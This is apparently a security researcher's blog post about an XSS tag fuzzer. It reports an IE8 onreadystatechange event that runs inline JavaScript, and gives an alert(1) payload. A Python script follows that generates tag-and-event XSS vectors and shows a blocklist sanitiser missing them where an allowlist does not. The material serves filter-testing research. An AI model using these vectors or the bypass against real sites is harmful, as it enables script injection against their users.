XSS tag fuzzer

hackvertor

Author:

Gareth Heyes

@hackvertor

Published: Wed, 18 Jun 2008 17:26:07 GMT

Updated: Sat, 22 Mar 2025 15:38:10 GMT

It's been a while since I've blogged, but I'm pretty busy at the moment with my new baby and also moving jobs, as I was made redundant. I thought I'd combine my work with my blogging, as I'm working on some XSS vectors for IE8.

During the process I built a simple tag fuzzer which throws every event and attribute at as many tags as I could find (big thanks to rsnake for the events). At the moment this is just a basic fuzzer which attempts the standard events/attributes, but I plan to add encodings and random characters to make it better.

One interesting discovery so far is that the applet, iframe and script tags have a new event in IE8 (at least I think it's new), onreadystatechange, which allows you to execute inline JS, e.g.:

```html
<applet onreadystatechange=alert(1)>
```

Only tested in IE8 but could work in other browsers.
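As an added example (not code from the original post), here is the core of such a fuzzer in Python: the tag × event product, then each vector run through two constructed filters to show why a blocklist of known event names misses a handler such as onreadystatechange while an attribute allowlist does not. The tag and event lists are constructed and far shorter than the original fuzzer's.

```python
import re
from itertools import product

# Constructed sample lists; the original fuzzer used many more tags and events.
TAGS = ["applet", "iframe", "script", "img", "body", "div"]
EVENTS = ["onload", "onerror", "onclick", "onmouseover", "onreadystatechange"]

def generate_vectors(tags=TAGS, events=EVENTS, payload="alert(1)"):
    """Cartesian product of tags and event handlers, unquoted like the post's example."""
    return [f"<{tag} {event}={payload}>" for tag, event in product(tags, events)]

TAG_RE = re.compile(r"<\s*(/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>")
ATTR_RE = re.compile(r"([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?:\s*=\s*(?:\"[^\"]*\"|'[^']*'|[^\s>]+))?")

def _rewrite_attrs(attr_text, keep):
    """Keep only the attributes whose lower-cased name passes keep()."""
    kept = [m.group(0) for m in ATTR_RE.finditer(attr_text) if keep(m.group(1).lower())]
    return (" " + " ".join(kept)) if kept else ""

# A blocklist filter (hypothetical): strips only the event names its author knew about.
BLOCKED_EVENTS = {"onload", "onerror", "onclick", "onmouseover"}

def blocklist_filter(fragment):
    def fix(m):
        slash, name, attrs = m.groups()
        return f"<{slash}{name}{_rewrite_attrs(attrs, lambda n: n not in BLOCKED_EVENTS)}>"
    return TAG_RE.sub(fix, fragment)

# An allowlist filter (hypothetical): drops unknown tags and non-allowlisted attributes.
ALLOWED_TAGS = {"b", "i", "p", "a", "img", "div"}
ALLOWED_ATTRS = {"href", "src", "alt", "title"}

def allowlist_filter(fragment):
    def fix(m):
        slash, name, attrs = m.groups()
        if name.lower() not in ALLOWED_TAGS:
            return ""
        return f"<{slash}{name}{_rewrite_attrs(attrs, lambda n: n in ALLOWED_ATTRS)}>"
    return TAG_RE.sub(fix, fragment)

def surviving_handlers(filter_fn, vectors=None):
    """Vectors that still carry an on* attribute after the filter has run."""
    if vectors is None:
        vectors = generate_vectors()
    handler = re.compile(r"<[^>]*\son[a-zA-Z]+\s*=", re.I)
    return [v for v in vectors if handler.search(filter_fn(v))]

if __name__ == "__main__":
    for label, fn in (("blocklist", blocklist_filter), ("allowlist", allowlist_filter)):
        survivors = surviving_handlers(fn)
        print(f"{label}: {len(survivors)} of {len(generate_vectors())} vectors keep a handler")
```

Running the script shows the blocklist letting every onreadystatechange vector through and the allowlist letting none through, which is the coverage gap a tag/event fuzzer is built to expose.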